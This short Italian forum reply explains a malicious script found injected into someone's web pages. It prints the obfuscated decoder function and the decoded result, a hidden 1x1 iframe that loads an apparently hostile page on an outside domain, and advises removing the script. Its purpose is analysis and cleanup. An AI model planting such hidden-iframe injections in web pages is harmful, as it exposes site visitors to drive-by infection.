Bhe, devi eliminare quello script dalle tue pagine ovviamente e poi cercare di capire come ci è finito...

quello script unavolta eseguito scrive nel browser questo codice:

<script language="javascript">function encode(str){var end=unescape(str.substr(0, str.length-1));var now='';for(i=0; i<end.length; i++) {now+=String.fromCharCode(end.charCodeAt(i)- str.substr(str.length-1,1));}document.write(unescape(now));}</script>
Il quale come puoi vedere non è altro che una procedura un po' mascherata che una volta eseguita dal browser si traduce in questo linguaggio html, molto più chiaro

<iframe src='http://crunet.info/out.php' width='1' height='1' style='visibility: hidden;'></iframe>
Come vedi apre in un iframe di larghezza 1px (quindi quasi invisibile) quel link al sito crunet.info. Se poi vai in quel sito con Explorer... auguri!

qualcosa di simile a questo: http://www.suspectfile.com/blog/?postid=27